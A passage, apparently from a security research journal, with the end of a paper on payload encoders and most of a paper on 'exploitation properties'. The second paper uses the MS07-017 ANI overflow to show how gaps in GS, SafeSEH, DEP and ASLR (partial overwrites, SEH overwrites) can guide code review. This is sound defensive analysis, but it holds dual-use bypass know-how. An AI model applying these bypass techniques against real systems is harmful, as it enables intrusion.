network security and monitoring systems will likely begin to join the few
currently existing systems[5, 2-4][4] that attempt to perform this type of real-time
analysis of suspected network exploit traffic, and more specifically, exploit
payloads.
4.1) Acknowledgments
The author would like to thank H.D. Moore and Matt Miller (a.k.a. skape) for
their assistance in developing the improved Metasploit implementation of the
Shikata ga Nai payload encoder as a proof of concept, as well as the
supporting tools provided by this research effort.
References
[1] Ivan Arce. The shellcode generation. IEEE Security & Privacy,
2(5):72-76, 2004.
[2] skape. Implementing a custom x86 encoder. Uninformed Journal, 5(3),
September 2006.
[3] Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, Sinan Eren, Neel
Mehta, and Riley Hassell. The Shellcoder's Handbook: Discovering and
Exploiting Security Holes. John Wiley & Sons, 2004.
[4] Paul Baecher and Markus Koetter. libemu. http://libemu.mwcollect.org/,
2007.
[5] R. Smith, A. Prigden, B. Thomason, and V. Shmatikov. Shellshock: Luring
malware into virtual honeypots by emulated response. October 2005.
[6] SkyLined and Pusscat. Alpha2 alphanumeric mixedcase encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:alpha_mixed.
[7] SkyLined and Pusscat. Alpha2 alphanumeric unicode mixedcase encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:unicode_mixed.
[8] H.D. Moore and spoonm. Call+4 dword xor encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:call4_dword_xor.
[9] spoonm. Polymorphic xor additive feedback encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:shikata_ga_nai.
[10] vlad902. Single-byte xor countdown encoder (x86).
http://framework.metasploit.com/encoders/view/?refname=x86:countdown.
[11] Microsoft. Microsoft security bulletin ms06-040.
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx, August
2006.
[12] |)ruid. smem-map - the static memory mapper.
https://sourceforge.net/projects/smem-map.
[13] Microsoft. Microsoft security bulletin ms04-007.
http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx,
February, 2004.
[14] The Metasploit Staff. Metasploit 3.0 Developer's Guide.
The Metasploit Project, December 2005.
[15] skape. Safely searching process virtual address space.
http://hick.org/code/skape/papers/egghunt-shellcode.pdf, September 2004.
[16] skape. Temporal return addresses. Uninformed Journal, 2(2), September
2005.
[17] SweetScape Software. 010 editor. http://www.sweetscape.com/010editor/,
2002.
[18] |)ruid. Memorymap.bt. http://druid.caughq.org/src/MemoryMap.bt, 2007.
Appendix
A) Memory Map File Specification
The memory map files created by this research effort's supporting tools adhere
to the file format specification described here. The file format is designed
specifically to be simple, light weight, and versatile.
A.1) File Format
An entire memory map file is comprised of individual data records concatenated
together. These individual data records represent a chunk of data found in a
process's memory space. This simple format allows for multiple memory map
files to be further concatenated to produce a single larger memory map file.
Individual data records are comprised of the following elements:
+----------+------------+--------------+
| Bit-Size | Byte-Order | Element |
+----------+------------+--------------+
| 8 | n/a | Data Type |
| 32 | big-endian | Base Address |
| 32 | big-endian | Size |
| Size | n/a | Data |
+----------+------------+--------------+
A.2) Data Type Values
The Data Type values are currently defined in the following table:
+-------+-------------------+
| Value | Type |
+-------+-------------------+
| 0 | Reserved |
| 1 | Static Data |
| 2 | Temporal Data |
| 3 | Environment Data |
+-------+-------------------+
A.3) File Parsing
Parsing of a memory map file is as simple as beginning with the first byte in
the file, reading the first three elements of the data record as they are of
fixed size, then using the last of those three elements as size indicator to
read the final element. If any data remains in the file, there is at least
one more data record to be read.
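A minimal parser following the steps above might look like this Python sketch
(the function and variable names are illustrative, not part of the
specification):

```python
import struct

# Sketch of a parser for the record format above: an 8-bit data type, a
# 32-bit big-endian base address, a 32-bit big-endian size, then `size`
# bytes of data, repeated until the file is exhausted.
def parse_memory_map(blob):
    records, offset = [], 0
    while offset < len(blob):
        dtype, base, size = struct.unpack_from(">BII", blob, offset)
        offset += 9  # fixed-size portion of the record
        data = blob[offset:offset + size]
        offset += size
        records.append((dtype, base, data))
    return records

# Concatenating map files is just concatenating their bytes:
rec = struct.pack(">BII", 1, 0x7FFE0000, 4) + b"\xde\xad\xbe\xef"
maps = parse_memory_map(rec + rec)
```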
To provide for easy parsing and review of memory map files, an 010 Editor
template is provided by this research effort.
Improving Software Security Analysis using Exploitation Properties
12/2007
skape
mmiller@hick.org
Abstract
Reliable exploitation of software vulnerabilities has continued to become more
difficult as formidable mitigations have been established and are now included
by default with most modern operating systems. Future exploitation of
software vulnerabilities will rely on either discovering ways to circumvent
these mitigations or uncovering flaws that are not adequately protected.
Since the majority of the mitigations that exist today lack universal bypass
techniques, it has become more fruitful to take the latter approach. It is in
this vein that this paper introduces the concept of exploitation properties
and describes how they can be used to better understand the exploitability of
a system irrespective of a particular vulnerability. Perceived exploitability
is of utmost importance to both an attacker and to a defender given the
presence of modern mitigations. The ANI vulnerability (MS07-017) is used to
help illustrate these points by acting as a simple example of a vulnerability
that may have been more easily identified as code that should have received
additional scrutiny by taking exploitation properties into consideration.
1) Introduction
Modern exploit mitigations have become formidable opponents with respect to
the effect they have on reliable exploitation. Some of the more substantial
modern mitigations include GuardStack (GS), SafeSEH, DEP (NX), ASLR, pointer
encoding, and various heap improvements[8, 9, 10, 15, 24, 3, 4]. The fact
that there have been very few public exploits that have been able to
universally bypass all of these mitigations at once is a testament to the
resilience of these techniques working in concert with one another. It is
obvious that the absence of a given mitigation directly contributes to the
exploitability of the associated code. Likewise, it is also well known that
most mitigations have situations in which they will offer little to no
protection[5, 16, 18, 20, 2, 4]. For instance, in certain cases, it may be
possible to perform a partial overwrite on Windows Vista to defeat ASLR due to
the fact that only 15 bits of most 32-bit addresses may be affected by
randomization[2, 17]. Other mitigations also have situations where they may
not provide adequate coverage.
Given the fact that the majority of mitigations have known limitations, it
makes sense to consider where this information might be useful. In the field
of program analysis, whether it be manual, static, or dynamic, the question of
scoping is often pertinent. This question typically revolves around figuring
out what areas of code should be reviewed and what precedence, if any, should
be assigned to different regions. Typical approaches taken to accomplish this
often involve identifying code that straddles a trust boundary or performs
complex operations reachable from a trust boundary. However, depending on
one's perspective, this type of approach is insufficient in the face of modern
mitigations because it may result in areas of code being reviewed that are
adequately protected by all mitigations.
To help address this perceived deficiency, this paper introduces the concept
of exploitation properties and describes how they can be used to provide a
better understanding of exploitability of a system if a vulnerability is found
to be present. Regions of code that are found to have a number of distinct
exploitation properties may be more interesting from an exploitation
standpoint and therefore may warrant additional scrutiny from a program
analysis perspective. The use of exploitation properties may benefit both an
attacker and a defender. For example, companies may wish to perform targeted
reviews on areas of code that may be more trivially exploited in an effort to
prevent reliable exploits from being released in the future. Likewise, an
attacker searching for a vulnerability may wish to avoid auditing regions of
code that are likely to be more difficult to exploit.
Exploitation properties represent additional criteria that can be used when
attempting to better understand the security aspects of a program. Annotating
regions of code with exploitation properties makes it possible to use set
unions and intersections to identify the subset of interesting regions of code
for a particular analysis problem. For example, an attacker may wish to
determine the regions of code that may permit the use of traditional
stack-based buffer overflow techniques as well as permitting a partial
overwrite of a return address in order to defeat ASLR. Using these two
exploitation properties as criteria, a narrowed subset can be produced
which contains only those regions which meet both criteria by intersecting
those regions that have both exploitation properties. For the purpose of
this paper, the term narrowing is not used in the strict mathematical
sense; rather, this paper uses narrowing to describe the process of
constraining the scope of analysis through the use of specific criteria.
The concept of using automated analysis as a precursor to more strenuous
program analysis is certainly not new. There have been many tools ranging
from the simple detection of calls to strcpy to much more sophisticated forms
of static analysis. Still, the use of exploitation properties can be seen as
an additional set of data points which may be useful in the context of program
analysis given the hypothesis that most reliably exploitable security
vulnerabilities are being pushed into areas of code that are less affected by
mitigations.
The concept of exploitation properties is presented as follows. Section 2
categorizes and defines a limited number of concrete exploitation properties.
Section 3 provides a concrete example of using exploitation properties to help
identify the function that contained the ANI vulnerability. Section 4
describes some potential ways in which exploitation properties can be applied.
Section 5 gives a brief description of future work involving exploitation
properties.
2) Exploitation Properties
Exploitation properties describe the ease with which an arbitrary
vulnerability might be exploited. An understanding of a system's perceived
exploitability can provide useful insights when attempting to establish the
risk factors associated with it. An example of this can be seen in threat
modeling where the DREAD model of classifying risk includes a high-level
evaluation of exploitability as one of the risk factors[14]. It is important
to note that exploitation properties do not provide any indication that a
vulnerability exists; instead, they are only meant to convey information about
how easily a vulnerability could be exploited. The concept of an exploitation
property can be broken into different categories which are tied to the
configuration or context that the property is associated with. Examples of
these categories include platforms, processes, binary modules, functions, and
so on.
The following subsections provide concrete examples to better illustrate the
concept of an exploitation property. These examples are given by showing what
implications a property has with respect to exploitation as well as how a
property might be derived. It should be noted that the examples given in this
paper do not represent a complete, exhaustive set of exploitation properties.
2.1) Platform Properties
Exploitation properties associated with a platform are meant to illustrate how
easily a vulnerability may be exploited when a given platform configuration,
such as the operating system or architecture, is used. For example, Windows
2000 does not include support for enforcing non-executable pages. This
implies that any vulnerability found within an application that runs in the
context of the Windows 2000 platform may be exploited more easily. An
understanding of exploitation properties that are associated with a platform
may be useful when attempting to assess the risk of applications that might
run on multiple platforms. There are many other examples of exploitation
properties that are tied to platforms. In order to limit the scope of this
document, platform exploitation properties are not discussed at length.
2.2) Process Properties
Process exploitation properties carry some information about how easily
vulnerabilities found within the context of a running process may be
exploited. For example, Internet Explorer running on 32-bit versions of
Windows Vista do not make use of hardware-enforced DEP (NX) by default. This
means that any vulnerabilities found within code that runs in the context of
Internet Explorer will not be protected by non-executable regions. An
understanding of exploitation properties that are associated with a process
context can help to provide a better understanding of the risks associated
with code that may run in the context of a given process. In order to limit
the scope of this document, process exploitation properties are not discussed
at length.
2.3) Module Properties
Module exploitation properties are used to illustrate the effect that a
particular binary module has on ease of exploitation. This category of
properties is useful when attempting to identify binaries that may be more
easily exploited if a vulnerability is found within them or in code that
depends on them. This subsection describes two examples of module
exploitation properties.
2.3.1) No Support for ASLR
Windows Vista was the first major release of Windows to include a built-in
implementation of Address Space Layout Randomization (ASLR)[15,24]. In order
to head off potential application compatibility issues, Microsoft chose to
make ASLR an opt-in feature by requiring binaries to be compiled with a new
compiler switch (/dynamicbase)[21]. This compiler switch is responsible for
setting a bit (0x40) in the DllCharacteristics field that is defined within a
binary. If this bit is set, the Windows kernel will attempt to randomize the
base address of the binary when it is mapped into memory the first time. If
the bit is not set, the binary will not have its base address randomized,
although it could be relocated in memory if the binary's preferred region is
already occupied by another allocation. As such, any binary that does not
support ASLR may be mapped at a predictable location within a process address
space at execution time. This can allow an attacker to make assumptions about
the address space which may make exploitation easier if a vulnerability is
found within any code that is mapped into the same address space as the module
of interest.
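As a sketch of how this opt-in bit might be checked, the following Python
reads the DllCharacteristics field from a PE image held in memory. The
offsets follow the PE/COFF specification (DllCharacteristics sits at offset
70 into the optional header for both PE32 and PE32+); the helper name is
illustrative:

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # set by /dynamicbase

def supports_aslr(image):
    """Check the ASLR opt-in bit in a PE image's DllCharacteristics."""
    # e_lfanew at 0x3c points at the 4-byte PE signature, which is
    # followed by the 20-byte COFF header and then the optional header.
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    opt_header = e_lfanew + 4 + 20
    dll_chars = struct.unpack_from("<H", image, opt_header + 70)[0]
    return bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
```

In practice this check would be run over every module loaded into the address
space of interest, since a single non-ASLR module undermines the mitigation.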
2.3.2) No Support for SafeSEH
With Visual Studio 2003, Microsoft introduced a compile-time change known as
SafeSEH which attempts to act as a mitigation for the SEH overwrite attack
vector[5,9]. SafeSEH works by adding a static list of known good exception
handlers that are considered valid as metadata within a given binary.
Binaries that support SafeSEH allow the exception dispatcher to perform
additional checks when dispatching exceptions. The most important check
involves determining if an exception handler that is found to exist within the
mapped region of a given binary is actually considered to be one of the safe
exception handlers. If the exception handler is not a safe exception handler,
the exception dispatcher can take steps to prevent it from being called. This
behavior works to mitigate the potential exploitation vector.
In order to communicate this information to the exception dispatcher, modern
PE files include fields in the load config data directory which hold the
offset of the safe exception handler table and the number of elements found
within the table. The load config data directory contains meta data that is
useful to the dynamic loader such as information about safe exception
handlers, the module's global security cookie address, and so on[13]. The
following output from dumpbin.exe illustrates what this might look like:
310751E0 Safe Exception Handler Table
1 Safe Exception Handler Count
Safe Exception Handler Table
Address
--------
310357D1 __except_handler4
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
unless every binary that is loaded into an address space has been compiled to
make use of SafeSEH. If a binary has not been compiled to make use of
SafeSEH, an attacker may be able to use any address found within the binary's
memory mapping as an exception handler in conjunction with an SEH overwrite.
2.4) Function Properties
Function exploitation properties convey information about how a function
contributes to the exploitability of an application. For example, a function
might make it possible to use certain exploitation techniques that might
otherwise be prevented if mitigations were present. Alternatively, a function
might simply assist in the exploitation process. Function exploitation
properties are especially useful because they provide more detailed
information than exploitation properties that are derived from the platform,
process, or module context.
2.4.1) Absence of GuardStack
The GuardStack (GS) support included with versions of the Microsoft Visual
Studio compiler since 2002 offers a compile-time mitigation to traditional
stack-based buffer overflows[23]. It supports this through a combination of a
random canary inserted into a stack frame at runtime and an intelligent stack
frame layout algorithm. The random canary is pushed onto the stack when a
function is called and then popped off the stack and validated prior to
function return. If the canary does not match the expected value, it is
assumed that a stack-based buffer overflow occurred and that the process
should be terminated.
Since the initial release of GS support a number of techniques have been
described that could be used to bypass or weaken it[5, 16, 20]. While these
techniques were at one time useful or have not yet been fully realized, the
author assumes that most would agree that the GS implementation provided by
the most recent compiler is robust (with the exception of SEH). There is
currently no publicly known universal bypass technique for GS that the author
is aware of. Given this assumption, functions that are protected by GS become
less interesting from the standpoint of identifying stack-based buffer
overflows. On the other hand, functions that are not protected by GS can
instantly be qualified as interesting targets for review. This is especially
true with binaries that have been compiled with GS support but contain a
number of functions that the compiler has chosen not to compile with GS
protections. This choice is made by taking into account certain conditions such
as the presence or absence of local variables that are declared as fixed-size
arrays.
As previous research has illustrated[27], it is possible to identify functions
that have not been compiled to use GS through the use of simple static
analysis tools. It is also possible to further refine the approaches
described in previous research if one has symbols and one assumes that the
most recent compiler was used. This can be accomplished by analyzing the call
graph of an executable and noting the set of functions that do not call
securitycheckcookie. Considered another way, the same set of functions can be
identified by taking the set of all functions contained within a binary less
the subset that call securitycheckcookie. The set of functions that is
identified by either approach can be annotated with an exploitation property
that indicates that they may contain stack-based buffer overflows that would
not be hindered by GS.
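The set operation described above can be sketched as follows. The call graph
and function names here are made up for illustration; a real implementation
would extract the graph from the binary with a disassembler:

```python
# Sketch: given a mapping from each function to the functions it calls,
# flag those that never call the GS check routine and therefore lack a
# stack cookie epilogue.
def unprotected_functions(call_graph, check="__security_check_cookie"):
    return {fn for fn, callees in call_graph.items() if check not in callees}

call_graph = {
    "parse_header": {"__security_check_cookie", "memcpy"},
    "parse_chunk": {"memcpy"},            # no cookie check: interesting
    "dispatch": {"parse_header", "parse_chunk"},
}
candidates = unprotected_functions(call_graph)
```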
It may also be prudent to take the compiler version that was used into
consideration when analyzing binaries. This is important due to the fact that
older versions of the compiler used a GS implementation that could be
trivially defeated in certain circumstances[16]. For example, previous versions
of GS did not layout the stack frame in a manner that would prevent an
attacker from overwriting other local variables and function arguments. In
scenarios where this occurred and an overwritten local variable or parameter
was dereferenced (such as by invoking a function pointer), the mitigation
offered by GS would be meaningless. Thus, a secondary exploitation property
could involve identifying functions where attacks such as the one described
above could be possible.
2.4.2) Partial Overwrite Feasibility
One of the unique consequences of implementing Address Space Layout
Randomization (ASLR) on Windows is the limitation that the system allocation
granularity imposes on the number of bits that can be randomized within most
memory allocations. In particular, the allocation granularity used by Windows
enforces strict 16-page alignment for the base addresses of most memory
mappings in user-mode. This restriction means that it is only possible to
introduce entropy into the low 15 bits of the high-order 16 bits of a 32-bit
memory mapping[17]. While this may sound odd at first glance, the high-order two
bits are not randomized due to the divide between kernel and user-mode. This
assumes that a machine is booted without /3GB. The low-order 16 bits remain
unchanged relative to the high-order bits. This caveat means that it may be
possible to perform a partial overwrite of an address and thus bypass the
security features offered by ASLR[2]. However, the ability to perform a partial
overwrite also relies on the presence of useful code or data within a region
that is relative to the address that is being overwritten.
To visualize how this type of information might be useful, consider a scenario
where an attacker is performing a partial overwrite of a return address on the
stack. In this situation, it is often necessary for one or more useful
opcodes to be present at an address that is 16-page relative to the return
address. For example, consider a scenario where the function f may have a
vulnerability that would permit a partial overwrite. In this example, f is
called by h and y. In order to permit the use of a partial overwrite, a useful
opcode must be found within the same 16-page aligned region that either h or
y resides on. If a useful opcode is present, an exploitation property can be
attached to f in order to indicate that a partial overwrite may be feasible
due to the presence of a useful opcode within the same 16-page aligned region
as either h or y. For example, consider the following pseudo-disassembly
illustrating a case where the call f instruction in h is on the same 16-page
region as a useful opcode:
... useful jmp on same 16-page region 0x14c1XXXX
0x14c1fc04 jmp esp
... entry point to h()
0x14c1a910 push ebp
0x14c1a911 mov ebp, esp
0x14c1a914 call f
... entry point to y(), not on same 16-page region
0x137f44c8 push ebp
While this captures the basic concept, a better approach might be to view a
binary in a different way. For example, consider the following approach to
drawing the same conclusion: for each code region that contains a useful
opcode, identify the subset of functions that are called from call sites
within the same 16-page aligned region as the useful opcode. This has the
effect of annotating all of the child functions that could potentially
leverage a partial overwrite of the return address with respect to a
particular collection of opcodes.
One important point that must be made about this exploitation property is that
it is entirely dependent upon the definition of "useful code or data".
Exploitation is very much an art and it goes without saying that attempting to
constrain the approaches that an attacker might make use of is likely to be
folly. However, defining a known-set of useful opcodes and using that set as
a base with which to draw the above conclusion can be said to be better than
not doing so at all.
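Since 16 pages of 4KB each span 64KB, the "same 16-page aligned region" test
reduces to comparing everything above the low 16 bits of each address. A
sketch, using the addresses from the pseudo-disassembly above:

```python
# Sketch: a partial overwrite of the low 16 bits of an address can only
# reach targets within the same 64KB (16-page aligned) region.
def same_16page_region(addr_a, addr_b):
    return (addr_a >> 16) == (addr_b >> 16)

assert same_16page_region(0x14C1A914, 0x14C1FC04)      # call site vs jmp esp
assert not same_16page_region(0x137F44C8, 0x14C1FC04)  # other caller
```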
2.4.3) Function or Parent Registers an Exception Handler
One of the unique exploitation vectors that exists in 32-bit programs that run
on Windows is known as an SEH overwrite[5]. An SEH overwrite makes it possible
to gain control of execution flow by overwriting an exception registration
record on the stack. From an exploitation perspective, the act of registering
an exception handler within a function opens up the possibility of making use
of an SEH overwrite. Since exception handlers are chained, the act of
registering an exception handler also implicates any functions that are
children of a function that registers the exception handler. This makes it
possible to define an exploitation property that illustrates the possibility
of an SEH overwrite being abused within the scope of a specific set of
functions. Detecting this property can be as simple as signaturing the
compiler generated code that is used to generate and register an exception
handler within a function. An example of two functions, f and g, that would
meet these criteria can be seen below:
void f() {
__try {
g();
} __except(EXCEPTION_EXECUTE_HANDLER) {
}
}
void g() {
...
}
In addition to this information being useful from an SEH overwrite
perspective, it may also benefit an attacker in situations where an exception
handler simply swallows any exceptions that are dispatched without crashing
the process[1]. In the example given above, any exception that occurs in the
context of will be swallowed by without necessarily crashing the process.
This behavior may allow an attacker to retry their exploitation attempt
multiple times, thus enabling a bruteforce attack that would otherwise not be
feasible. This can make defeating ASLR more feasible.
2.4.4) Function is an Exception Handler
The introduction of SafeSEH as a modern compile-time mitigation has caused the
particulars of how exception handlers are implemented to become more
interesting. This has to do with the fact that SafeSEH restricts the set of
exception handlers that may be called by the exception dispatcher to those
that are specified as being valid within the scope of a given binary. As
discussed previously in this paper, SafeSEH prevents traditional SEH
overwrites from being able to use any address as the overwritten exception
handler. While this is effective in its primary intent, there is still the
possibility that a valid exception handler can be abused to make exploitation
more feasible[1]. This scenario is restricted to EH3 and prior exception
handlers as EH4 includes a check of a cookie before dispatching exceptions.
As such, it may be useful to flag the regions of code that are associated with
EH3 and prior exception handlers, including language-specific exception
handlers, as being potentially interesting from an exploitation perspective.
Unfortunately, as with ASLR, the benefits offered by SafeSEH are not complete
unless every binary that is loaded into a process address space has been
compiled to make use of SafeSEH. If a binary has not been compiled to make
use of SafeSEH, an attacker may be able to use any address found within the
binary's memory mapping as an exception handler in the context of an SEH
overwrite. This may make exploitation more feasible.
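The SafeSEH determination itself reduces to inspecting a binary's load config
directory. The following minimal sketch models that check with a trimmed
stand-in structure; the field names mirror IMAGE_LOAD_CONFIG_DIRECTORY32, but
the struct here is a hypothetical stand-in, not the full Windows definition:

```c
#include <stdint.h>
#include <stddef.h>

/* Trimmed stand-in for the load config directory fields that matter
 * for SafeSEH; not the full IMAGE_LOAD_CONFIG_DIRECTORY32 layout. */
struct load_config_stub {
    uint32_t SEHandlerTable;   /* VA of the sorted table of handler RVAs */
    uint32_t SEHandlerCount;   /* number of entries in that table */
};

/* A binary is SafeSEH-aware when it carries a non-empty handler table. */
int has_safeseh(const struct load_config_stub *cfg)
{
    return cfg != NULL && cfg->SEHandlerTable != 0 && cfg->SEHandlerCount > 0;
}
```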
3) Case Study: MS07-017
The animated cursor (ANI) vulnerability was discovered by Alexander Sotirov in
late 2006 and patched by Microsoft with the MS07-017 critical update in April,
2007. Apart from being a client-side vulnerability that was exposed through
web-browsers and other mediums, the ANI vulnerability was one of the first
notable security issues that affected Windows Vista. It was notable due to
the simple fact that even though Microsoft had touted Windows Vista as being
the most secure operating system to date, the exploits that were released for
the ANI vulnerability were very reliable. These exploits were able to ignore
or defeat the protections offered by mitigations such as GS, DEP, and even
Vista's newest mitigation: ASLR.
To better understand how this was possible it is important to dive deeper into
the details of the vulnerability itself. Section 3.1 gives a brief description
of the ANI vulnerability and some of the techniques that were used to
successfully exploit it. Following this description, section 3.2 illustrates
how exploitation
properties, in combination with another class of properties, can be used to
detect functions that may contain vulnerabilities similar to the ANI
vulnerability. This is meant to help illustrate the perceived benefits of
applying the concept of exploitation properties to aid in the process of
identifying regions of code that may deserve additional scrutiny based on
their perceived exploitability.
3.1) Background
While the ANI vulnerability was certainly unique, it was not the first time
the animated cursor code was found to have a security issue. Microsoft patched
an issue that was almost exactly the same as MS07-017 with MS05-002 roughly
two years prior. In both cases, the underlying security issue was related to
a failure to properly validate input that was derived from the contents of an
animated cursor file. Alexander Sotirov provided much of the initial research
on the ANI vulnerability and also gave an excellent write-up to its effect[22].
This paper will only attempt to highlight the flaw.
The vulnerability itself was found in user32!LoadAniIcon which is responsible
for processing a number of different chunks that may be contained within an
animated cursor file. Each chunk is a TLV (Type-Length-Value) as described
by the following structure:
struct ANIChunk
{
    char  tag[4];       // ASCII tag
    DWORD size;         // length of data in bytes
    char  data[size];   // variable sized data
};
Keeping this structure in mind, the flaw itself can be seen in the abbreviated
pseudo-code below as modified slightly from Sotirov's original write-up:
01: int LoadAniIcon(struct MappedFile* file, ...) {
02:   struct ANIChunk chunk;
03:   struct ANIHeader header; // 36 byte structure
04:   while (1) {
05:     // read the first 8 bytes of the chunk
06:     ReadTag(file, &chunk);
07:     switch (chunk.tag) {
08:       case 'anih':
09:         // read chunk.size bytes into header
10:         ReadChunk(file, &chunk, &header);
On line 6, the chunk header is read into the local variable chunk using
ReadTag which populates the chunk's tag and size fields. If the chunk's tag
is equal to 'anih', the data associated with the chunk is read into the header
local variable using ReadChunk on line 10. The problem is that ReadChunk uses
the size field of the chunk as the amount of data to read from the file.
Since header is a fixed-size (36 byte) data structure and the chunk's size can
be variable, a trivial stack-based buffer overflow may occur if more than 36
bytes are specified as the chunk size. In terms of the vulnerability, that's
all there is to it, but the implications from an exploitation perspective are
where things start to get interesting.
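For contrast, a bounds-checked read would clamp the attacker-controlled chunk
size to the destination's capacity before copying. The helper below is a
hypothetical sketch of such a hardened copy, not Microsoft's actual fix:

```c
#include <string.h>
#include <stddef.h>

/* Hypothetical hardened copy: never write more than dst_size bytes,
 * regardless of the (attacker-controlled) chunk size from the file. */
size_t bounded_chunk_copy(unsigned char *dst, size_t dst_size,
                          const unsigned char *src, size_t chunk_size)
{
    size_t n = chunk_size < dst_size ? chunk_size : dst_size;
    memcpy(dst, src, n);
    return n;  /* bytes actually copied, never more than dst_size */
}
```

With this in place, an 'anih' chunk claiming a size larger than the 36-byte
header would simply be truncated rather than overflowing the stack.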
When attempting to exploit this vulnerability it may at first appear that all
attempts to do so would be futile. Given Vista's security push, an attacker
would be justified in thinking that surely the LoadAniIcon function is
protected by a GS cookie. This point is especially justified considering the
majority of all binaries shipped with Windows Vista have been compiled with GS
enabled[27]. However, there are indeed circumstances where the compiler will
choose to not enable GS for a specific function. As chance would have it, the
compiler chose not to enable GS for the LoadAniIcon function because of the
simple fact that it does not contain any characteristics that would suggest
that a stack-based buffer overflow might be possible (such as the use of
stack-allocated arrays). This means that an attacker is able to make use of
exploitation techniques that are associated with traditional stack-based
buffer overflows. While this drastically increases the chances of being able
to produce a reliable exploit, there are still other mitigations that are of
potential concern.
Another mitigation that might be concerning in most circumstances is
hardware-enforced DEP (NX). This would generally prevent an attacker from
being able to run arbitrary code within regions that are not marked as
executable (such as the stack and the heap). However, as fate would have it,
Internet Explorer is configured to not run with DEP enabled. This immediately
removes this concern from the equation for exploits that attempt to trigger
the ANI vulnerability through Internet Explorer. With DEP out of the picture,
ASLR becomes a weakened but still potentially significant hurdle.
While it may appear that ASLR would be challenging to defeat in most
circumstances, this particular vulnerability provides an example of two
different ways in which ASLR can be bypassed. The simplest approach, as taken
by Sotirov, involves making use of the fact that Internet Explorer is not
compiled with support for ASLR and therefore can be found at a fixed address
within the address space. This allows an attacker to make use of opcodes
contained within iexplore.exe's memory mapping. A second approach, as taken
by the author, involves using a partial overwrite to ignore the effects of
ASLR completely. The details relating to how a partial overwrite works were
explained in 2.4.2. In either case, an attacker is able to reliably defeat Vista's
ASLR.
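The arithmetic behind a partial overwrite can be sketched directly:
overwriting only the low 16 bits of a saved return address preserves the
randomized upper bits, so the redirected target necessarily lands within the
same 64KB region as the original address. A minimal illustration:

```c
#include <stdint.h>

/* Model of a 2-byte partial overwrite of a saved 32-bit return address:
 * only the low 16 bits are replaced, so the ASLR-randomized upper bits
 * survive and the target stays within the original 64KB region. */
uint32_t partial_overwrite(uint32_t saved_ret, uint16_t new_low)
{
    return (saved_ret & 0xFFFF0000u) | new_low;
}
```

The addresses used here are purely illustrative; the point is that no
knowledge of the randomized upper bits is required to choose new_low.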
To compound the problem, the particulars of the context in which this
vulnerability occurs make it easier to exploit even without the presence of
mitigations. This improved reliability comes from the fact that the
LoadAniIcon function is wrapped in an exception handling context that simply
swallows exceptions that are encountered. This makes it possible for an
exploit to fail without actually crashing the process, thus allowing the
attacker to try multiple times without having to worry about making a mistake
that crashes the process. When all is said and done, the simplicity of the
vulnerability and the ease with which mitigations could be bypassed are what
led to the ANI vulnerability being quite unique. Given the fact that this
vulnerability can be so easily exploited, it is prudent to describe how the
affected function could have been identified as high risk.
3.2) Detection
The ease of exploitability associated with the ANI vulnerability makes it an
obvious candidate for study with respect to the exploitation properties that
have been described in this paper. It should be possible to use extremely
simple criteria to accomplish two things. First, the criteria must identify
the LoadAniIcon function. Second, the criteria should be unique enough to
limit the size of the narrowed subset. Reducing the subset size is beneficial
as it may permit the use of more complex program analysis tools which can
further constrain or explicitly identify instances of vulnerabilities.
Determining the specific criteria that is needed to identify the LoadAniIcon
function can help illustrate how one can make use of exploitation properties.
Given the description of the ANI vulnerability, one can easily deduce some of
the more interesting properties that it has.
An exploitation property that one might immediately observe is that the
LoadAniIcon function does not make use of GS (2.4.1). This makes it possible to
define criteria which states that only functions that have not been compiled
with GS should be considered. Functions that have been compiled with GS are
inherently less interesting for the purpose of this exercise due to the fact
that they are less likely to contain exploitable vulnerabilities.
A second property that the ANI vulnerability had with regard to exploitation
was that it was possible for an attacker to make use of a partial overwrite to
defeat ASLR. The exploitation property described in 2.4.2 illustrates how one can
make this determination statically. In the case of the ANI vulnerability, a
partial overwrite can be performed by making use of a jmp [ebx] that is
located within the same 16-page aligned region as the caller of LoadAniIcon.
Thus, any functions that could potentially make use of a partial overwrite can
be used as additional criteria.
At this point, a subset can be produced that is constrained to the regions of
code that are annotated with the GS and partial overwrite exploitation
properties. It is possible to further refine the set of functions that should
ultimately be considered by studying the form that the ANI vulnerability took.
The first point to note is that the stack-based buffer overflow occurred when
writing beyond the bounds of a struct that was allocated on the stack.
Furthermore, the overflow did not actually occur in the immediate context of
LoadAniIcon itself. Instead, the overflow was triggered by passing a
pointer to the stack-allocated struct as a parameter when calling the function
ReadChunk.
Based on these data points it is possible to define a third criteria. In this
case, the third criteria is not an exploitation property but is instead an
example of a vulnerability property. While not discussed in detail in this
paper, many examples of vulnerability properties exist, though perhaps not
categorized as such. A vulnerability property can be thought of as an
annotation that illustrates whether or not a region of code has a form that is
similar to that seen in vulnerabilities or has the potential of being a
vulnerability. The complexity of a vulnerability property, as with the
complexity of an exploitation property, can range from highly sophisticated to
very simplistic.
For the purpose of this paper, a vulnerability property can be used that is
very simple and imprecise but nevertheless effective at further narrowing the
set of functions that should be reviewed. This property is based on whether
or not a function passes a pointer to a stack-allocated variable as a
parameter to a child function. This property is directly derived from the
general form that the ANI vulnerability takes. At a minimum, a region of code
that matches this form suggests that a vulnerability could be present.
Using these three properties, it should be possible to easily identify both
the function that contains the ANI vulnerability as well as other functions
that could contain similar vulnerabilities. However, it is important to note
that this process does not produce functions that definitely have
vulnerabilities. This can be plainly seen by the fact that both the
vulnerable and fixed versions of LoadAniIcon should be detected by the
criteria described above. While this may seem to run counter to the purposes
of this paper, it is important for the reader to remember that the goal of
using these exploitation properties is not to identify specific instances of
vulnerabilities. Instead, the goal is to identify regions of code that might
warrant additional scrutiny due to the relative ease with which a
vulnerability could be exploited if one is found to be present.
3.3) Test Case
The author developed an analysis tool as an extension to Microsoft's Phoenix
framework in order to test the ideas described in this paper[12]. Unfortunately,
the current release (July 2007 SDK) of Phoenix requires private symbol
information for native binaries. This limitation prevented the author from
being able to run the analysis tool across the vulnerable version of
user32.dll. In lieu of this ability, the author chose to generate a binary
containing test cases that closely mirror the form of the function containing
